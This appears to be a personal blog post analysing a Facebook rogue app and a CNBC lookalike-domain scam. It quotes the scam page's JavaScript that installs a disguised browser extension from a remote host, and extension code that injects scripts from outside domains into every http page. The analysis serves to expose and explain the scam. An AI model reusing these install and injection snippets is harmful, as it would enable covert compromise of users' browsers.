Analysing a facebook spam/rogue app

Recently a couple of my friends were affected by a rogue app that posted crap using their accounts, and I was a bit curious how everything worked. But, typically they are so short lived, that by the time I get to see them, they are gone from the face of the internet, but, this time...

Luckily today another of my friends *liked* one such shit, and lets see how it works...

First off, it links to an exact Facebook look alike page... http://kustuntuniya.blogspot.com/?3

The page is an exact look alike, however, the lazy fellows were lazy enough not actually make all the links work. The header is just a div element with a CSS background image.

background: url("http://i55.tinypic.com/jpj7fl.jpg") no-repeat scroll center top #3B5998;

 

Similarly the bottom part, is another image http://i.imgur.com/ZJLcI.jpg

Now, its the middle part that is actually interesting. 
The whole dark area is an iframe containing the page http://installplug.info/girlplugin.html 

The page has all the elements and the button like anchor tag, "Install Plugin", with the following code,  
<a class="install nomargin" onclick="instalar();">a>

So, it call our beloved instalar  function in javascript, which is found above in a script tag.


The next two lines tell them the type of browser... To install the XPI addon for firefox and CRX addon for Google chrome.


var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;

var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar() 

{

      //Installls CHROME addon

     if (  is_chrome     ){

             window.open("http://installplug.info/youtube.crx");

     } 

    else if  (    is_firefox    )   {

                      var params = {

                            "Youtube Extension": {

                                      URL: "http://installplug.info/youtube.xpi",

                                      toString: function () { return this.URL; }

                            }

                       }; 

           //Installs Firefox addon

           InstallTrigger.install(params);

     } 

   else{

                      window.open("http://installplug.info/shirt/complete.php");

     }

}

At this point the browser has been successfully compromised, with a damned extension, installed fully with the gullible user's explicit permission!!!

Now to the damned browser extensions. Getting late, but tonight I'd rather give in to curiosity....

So I downloaded and extracted both the plugins. The extensions use youtube icons to keep the user fooled.

Both the browser plugins do the same thing, 

When the user visits any page, it first checks whether it is a protected (https) page or not. If it is protected, it does nothing, 

if ('https:' == document.location.protocol) return false;

 

if the page is a normal page (http), it injects its own script as a child in the head.

var s = document.createElement('script');
    s.setAttribute("type","text/javascript");
    s.setAttribute("src", "http://installplug.info/script.js");

Now, got to download another script to see the actual rascal.

And here I go again, well, the file has code to download another script and inject the new one in the same page...

s.setAttribute("src", "http://munishocks.info/new/extra.js");

The trail got cold here..., I'm unable to download the new file. Maybe I'm late once again. Next time, send it to me SOOOON.

Jesso busts a Madras Mom - Explaining the cnbc scam

One of my friends in facebook just put this on his status,

 "are you serious about starting your own business in 2011? you have to check this out - http://t.co/q4bfMkga"

Now, if you visit this link it takes you to "http://www.cnbc.com-id.us/t/?blabla=1?t=38627"

Which is CNBC, the CNBC we all know, or wait is it really???

Let me break the URL apart.

"http://www.cnbc.com-id.us/" Note the bold part. So, really the website is NOT cnbc.com

To be clear "http://www.cnbc.com-id.us/" is NOT EQUAL TO http://www.cnbc.com

Why not?

well the extension  -id.us shows us that it is something like http://developers.facebook.com. So, facebook could similarly very well have something like google.com.facebook.com/ It would still belong to facebook. Things don't end at .com, if that is not the last thing in the address bar.

So google has something like mail.google.com, that is mail in google's domain. Similarly google could have named google plus as facebook.com-google.com!!! It would go to google's servers.

The scam site is really *cnbc* in "com-id.us" domain. Well, this is the one line which really matters...
To make the scam complete all the hyperlinks point to the real cnbc.com BUT all the links which are related to the scam go to http://www.cnbc.com-featured.us/

But for people who took so much pain, the real joke is Patrica Feeney - Madras Mom, come on, how about Chennai Mom, Ooops, I'm sorry I just found out that there is some Madras in Jefferson County in Oregon, but to find other Chennai guys dreaming of making big bucks sitting in your home or just dreaming about seeing Patrica Feeney in your neighborhood, sorry...